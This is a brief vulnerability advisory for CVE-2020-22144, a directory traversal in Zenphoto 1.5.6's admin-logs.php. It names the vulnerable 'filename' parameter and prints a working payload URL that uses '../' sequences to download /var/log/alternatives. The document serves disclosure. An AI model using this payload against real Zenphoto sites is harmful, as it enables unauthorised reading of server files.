CVE-2020-22144

An issue in /zp-core/admin-logs.php of Zenphoto 1.5.6 allows attackers to perform a directory traversal and read arbitrary log files.


Description:
The admin function allows to download log files from the local system that are not suppose to.

Details:
File: /zp-core/admin-logs.php
Parameter: filename

Payload:

/zp-core/admin-logs.php?action=download_log&page=logs&tab=setup&filename=../../../../../../../../../var/log/alternatives&XSRFToken=bcf89608fdaaa5e293ccd5f83d1614f05bfcbaae

PoC:
cve-2020-22144 Zenphoto path traversal